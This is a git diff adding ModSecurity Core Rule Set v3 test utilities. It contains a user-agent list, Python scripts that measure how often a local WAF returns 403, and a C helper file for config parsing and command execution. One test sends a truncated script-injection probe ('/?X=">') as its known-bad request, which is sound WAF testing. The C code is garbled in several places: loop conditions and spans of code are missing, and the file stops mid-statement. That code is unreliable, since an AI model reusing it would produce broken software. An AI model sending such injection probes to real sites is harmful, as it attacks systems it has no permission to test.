(compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) +Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm) +Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 +Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 +Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 +Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 +Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 +Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 +NetSurf/1.2 (NetBSD; amd64) +Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 +Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 +Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0 +NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 +Offline Explorer/2.5 +Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30 +Opera/7.50 (Windows ME; U) [en] +Opera/7.50 (Windows XP; U) +Opera/7.51 (Windows NT 5.1; U) [en] +Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr) +Opera/9.0 (Macintosh; PPC Mac OS X; U; en) +Opera/9.20 (Macintosh; Intel Mac OS X; U; en) +Opera/9.25 (Windows NT 6.0; U; en) +Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) +Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1 +Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en) +Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0 +Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 +Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1 +Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 +Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 +Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0 +Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00 +Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 +Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 +Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10 +Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 +Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01 +Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00 +Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; FreeBSD 8.1-RELEASE i386; Edition Next) Presto/2.12.388 Version/12.10 +Opera/9.80 (X11; Linux i686) Presto/2.12.388 Version/12.16 +Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10 +Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 +P3P Validator +POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1 +POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 +Peach/1.01 (Ubuntu 8.04 LTS; U; en) +Python-urllib/2.5 +SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 +SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +SEC-SGHE900/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) +SEC-SGHX210/1.0 UP.Link/6.3.1.13.0 +SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SearchExpress +SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 +SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT100/R101 +SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0 +SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonT68/R201A +SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 +SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US] +SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0 +SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +SuperBot/4.4.0.60 (Windows XP) +UCWEB/8.8 (SymbianOS/9.2; U; en-US; NokiaE63) AppleWebKit/534.1 UCBrowser/8.8.0.245 Mobile +UCWEB/8.8 (iPhone; CPU OS_6; en-US)AppleWebKit/534.1 U3/3.0.0 Mobile +User agent: Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 Mobile Safari/537.36 +Uzbl (Webkit 1.3) (Linux i686 [i686]) +Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 +W3C_Validator/1.305.2.12 libwww-perl/5.64 +W3C_Validator/1.654 +WDG_Validator/1.6.2 +Web Downloader/6.9 +WebCopier v4.6 +WebZIP/3.5 (http://www.spidersoft.com) +Wget/1.9 cvs-stable (Red Hat modified) +Wget/1.9.1 +everyfeed-spider/2.0 (http://www.everyfeed.com) +facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) +iTunes/9.0.2 (Windows; N) +iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca) +libwww-perl/5.820 +msnbot-media/1.1 ( http://search.msn.com/msnbot.htm) +msnbot/0.11 ( http://search.msn.com/msnbot.htm) +msnbot/1.0 ( http://search.msn.com/msnbot.htm) +msnbot/1.1 ( http://search.msn.com/msnbot.htm) +nook browser/1.0 +portalmmm/2.0 N410i(c20;TB) +w3m/0.5.1 +w3m/0.5.1 +wii libnup/1.0 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testSampling.py b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testSampling.py new file mode 100644 index 000000000..e7e1223a4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testSampling.py @@ -0,0 +1,46 @@ +from ftw import ruleset, http, errors + +""" +This script assumes that default blocking action is 403 +and sampling is one. It will send a know bad request +that is expected to be blocked. If sampling is on it +will only block a certain percentage. We send 1000 +requests to verify this. In order to do this we must +also turn off IP Reputation blocking. +SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000" +""" +def send_requests(input_data,subiters,result,index): + http_ua = http.HttpUA() + for i in range(0,subiters): + new_index = str(index)+str(i) + http_ua.send_request(input_data) + result[new_index] = http_ua.response_object.status +def run_requests(iterations): + """Post request with no content-type AND no content-length""" + x = ruleset.Input(method="GET", protocol="http",port=80,uri='/?X=">',dest_addr="localhost",headers={"Host":"localhost","User-Agent":"ModSecurity CRS 3 test"}) + import threading + returns = {} + threads = [] + for i in range(5): + t = threading.Thread(target=send_requests,args=(x,100, returns,i,)) + threads.append(t) + t.start() + for t in threads: + t.join() + status_not_403 = 0 + status_403 = 0 + for status in returns.values(): + if status == 403: + status_403 += 1 + else: + status_not_403 += 1 + x = (status_403/(len(returns)*1.0))*100 + y = (status_not_403/(len(returns)*1.0))*100 + print "403s =", x + print "not 403s =", y + return (x,y) + +def test_sampling(): + print "running" + block,passed = run_requests(100) + assert block < 55 and block > 45 diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testUserAgents.py b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testUserAgents.py new file mode 100644 index 000000000..78af92d54 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/testUserAgents.py @@ -0,0 +1,37 @@ +from ftw import ruleset, http, errors + +""" +This script reads in a list of popular Useragents and checks to see if it triggers +It expects 403's to be returned for a rule firing +""" + +def read_useragents(filename): + f = open(filename,'r') + useragents = [agent.strip() for agent in f.readlines()] + return useragents + +def run_requests(useragent_list): + status_not_403 = 0 + status_403 = 0 + for useragent in useragent_list: + # get me a counter while i'm waiting + if (status_not_403 + status_403)%15 == 0: + print("Send",status_not_403 + status_403, "Out of",len(useragent_list)) + input_data = ruleset.Input(method="GET", protocol="http",port=80,uri='/',dest_addr="localhost",headers={"Host":"localhost","User-Agent":useragent}) + http_ua = http.HttpUA() + http_ua.send_request(input_data) + status = http_ua.response_object.status + if status == 403: + status_403 += 1 + else: + status_not_403 += 1 + x = (status_403/(len(useragent_list)*1.0))*100 + y = (status_not_403/(len(useragent_list)*1.0))*100 + print "403s =", x + print "not 403s =", y + + +def main(): + uas = read_useragents('./data/popularUAs.data') + run_requests(uas) +main() diff --git a/src/common/core/modsecurity/files/coreruleset/util/README b/src/common/core/modsecurity/files/coreruleset-v3/util/README similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/README rename to src/common/core/modsecurity/files/coreruleset-v3/util/README diff --git a/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.c b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.c new file mode 100755 index 000000000..e7ba76069 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/util/av-scanning/runAV/common.c @@ -0,0 +1,652 @@ +#include "common.h" + +int lock_file(char *filename) +{ + int fd; + + if (!filename) + return -1; + + if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) { + print_error("lock_file","open",modsec_rpc_log_file,errno); + return -1; + } + + flock(fd,LOCK_EX); + + return fd; +} + +int unlock_file(int fd) +{ + flock(fd,LOCK_UN); + return 0; +} + +int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) +{ + char time_str[64], line[1024*1024]; + time_t t; + int fd; + int i; + + switch (atoi(modsec_rpc_log_level)) { + case DEBUG: + time(&t); + ctime_r(&t,time_str); + time_str[strlen(time_str)-1] = '\0'; + if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { + print_error("print_request","open",modsec_rpc_log_file,errno); + fd=2; + } + flock(fd,LOCK_EX); + sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command); + line[1024*1024-1]='\0'; + write(fd,line,strlen(line)); + for (i=0; i 0 && output) output[0]='\0'; + if (!(fp=popen(command,"r"))) { + print_error("run_cmd","popen",command,errno); + return -1; + } + + while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) { + strcat(output, line); + output_size -= strlen(line); + } + + if (!output_size) + while (fgets(line,1024,fp)); + + pclose(fp); + return 0; +} + +int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters) +{ + int i, idx=-1; + + for (i = 0; (i < max_parameters) && (idx < 0); i++) + if ( strstr(parameters[i].name,parameter_name) ) + idx=i; + return idx; +} + +int parse_file(char *filename, parameter_t *parameters, int max_parameters) +{ + char line[1024], *ptr; + int i; + FILE *fp; + + if (!max_parameters || (parameters == NULL) || (filename == NULL)) { + print_error("parse_file","invalid input parameters","none",0); + return 0; + } + + if ((fp = fopen(filename,"r")) == NULL ) { + print_error("parse_file","fopen",filename,errno); + return 0; + } + + i=0; + while ( i < max_parameters && fgets(line,1024,fp)) { + if (ptr = strstr(line,"#")) + *ptr='\0'; + if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) + continue; + i++; + } + + fclose(fp); + + return i; +} + +int change_file(char *filename, parameter_t parameter) +{ + char line[1024], *name, *value; + int i, found=0; + FILE *fp; + + if (filename == NULL) + return 0; + + if ((fp = fopen(filename,"r+")) == NULL ) + return 0; + + i=0; + while ( fgets(line,1024,fp)) { + sscanf(line,"%[^=]=%s",name,value); + if (name && !strcmp(name,parameter.name)) { + fprintf(fp,"%s=%s\n",name,parameter.value); + found=1; + continue; + } else fprintf(fp,"%s",line); + } + + fclose(fp); + return found; +} + +int copy_file(char *src_file, char *dst_file) +{ + char line[1024]; + FILE *sfp, *dfp; + + if (src_file == NULL || dst_file == NULL) + return 0; + + if ((sfp = fopen(src_file,"r")) == NULL ) + return 0; + + if ((dfp = fopen(dst_file,"w")) == NULL ) { + fclose(sfp); + return 0; + } + + while ( fgets(line,1024,sfp)) + fprintf(dfp,"%s",line); + + fclose(sfp); + fclose(dfp); + return 1; +} + +int parse_query(char *query, parameter_t *parameters, int max_parameters) +{ + char *ptr, *dst_ptr, num[3]; + int i, len; + + if (!max_parameters || (parameters == NULL) || (query == NULL)) + return 0; + + ptr=query; + i=0; + while ((i < max_parameters) && *ptr) { + parameters[i].name[0] = '\0'; + dst_ptr = parameters[i].name; + len=0; + while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_NAME_LENGTH) + while (*ptr && (*ptr != '=')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + parameters[i].value[0] = '\0'; + dst_ptr = parameters[i].value; + len=0; + while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) { + if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { + num[0]=*(ptr+1); + num[1]=*(ptr+2); + num[2]='\0'; + ptr += 3; + *dst_ptr=(char)strtol(num,NULL,16); + if (*dst_ptr) dst_ptr++; + } else *dst_ptr++ = *ptr++; + } + if (len >= MAX_VALUE_LENGTH) + while (*ptr && (*ptr != '&')) + *ptr++; + if (*ptr) ptr++; + *dst_ptr = '\0'; + i++; + } + + return i; +} + +int parse_query_and_body (parameter_t *parameters, int max_parameters) +{ + char *query, *content_length_env; + int i, num_of_params, body_len, content_length; + + query = getenv("QUERY_STRING"); + if (query && *query) + return(parse_query(query,parameters,max_parameters)); + else { + content_length_env = getenv("CONTENT_LENGTH"); + if (!content_length_env) + return 0; + if (! *content_length_env) + return 0; + content_length=atol(content_length_env); + if (!(query=malloc(content_length+1))) + return 0; + i = 1; body_len=0; + while ( (body_len < content_length) && (i>0) ) { + i = read(0,query+body_len,(content_length-body_len)<1024?(content_length-body_len):1024); + if (i > 0 ) body_len+=i; + } + query[body_len] = '\0'; + num_of_params = parse_query(query,parameters,max_parameters); + free(query); + return num_of_params; + } +} + +int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]) +{ + char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH]; + int i, num_of_params=0; + + if (num_of_args > 0) + for (i=0; i0) ) { + i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); + if (i > 0 ) reply_len+=i; + } + reply[reply_len] = '\0'; + + shutdown(sock,SHUT_RDWR); + close(sock); + return reply_len; +} + +int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, idx=-1; + + for (i = 0; (i < num_of_ips) && (idx < 0); i++) + if ( strstr(blocklist[i].ip,ip) ) + idx=i; + return idx; +} + +int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips) +{ + int i, j, idx=-1; + time_t t; + + time(&t); + for (i = 0; i < num_of_ips; i++) + if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) { + idx=i; + for (j=i; j<(num_of_ips-1); j++) { + strcpy(blocklist[j].ip,blocklist[j+1].ip); + blocklist[j].start = blocklist[j+1].start; + blocklist[j].duration = blocklist[j+1].duration; + blocklist[j].end = blocklist[j+1].end; + strcpy(blocklist[j].token,blocklist[j+1].token); + } + num_of_ips--; + } + return idx; +} + +int read_conf_file (char *filename) +{ + int idx, num_of_params; + parameter_t parameters[MAX_PARAMS]; + + num_of_params=parse_file(filename,parameters,MAX_PARAMS); + + if ((idx = find_param_idx("MODSEC_CLI_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_cli_home,parameters[idx].value); + if ((idx = find_param_idx("MODSEC_RPC_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_FILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_file,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SSL_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_ssl_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_SENSOR_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_sensor_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_REVERSEPROXY_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_reverseproxy_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_EXTERNALNIC_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_externalnic_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_MUI_LOCKFILE",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_mui_lockfile,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_RPC_LOG_LEVEL",parameters,num_of_params)) >= 0) + strcpy(modsec_rpc_log_level,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_HOME",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_home,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_IP",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ip,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PORT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_port,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_NETWORK_PREFIX",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_network_prefix,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BIN",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_bin,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_CONF",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_conf,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_EXT_NIC",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_ext_nic,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_PID",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_pid,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_WHITELIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_whitelist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_BLACKLIST",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_blacklist,parameters[idx].value); + + if ((idx = find_param_idx("MODSEC_PROXY_TIMEOUT",parameters,num_of_params)) >= 0) + strcpy(modsec_proxy_timeout,parameters[idx].value); + + if ((idx = 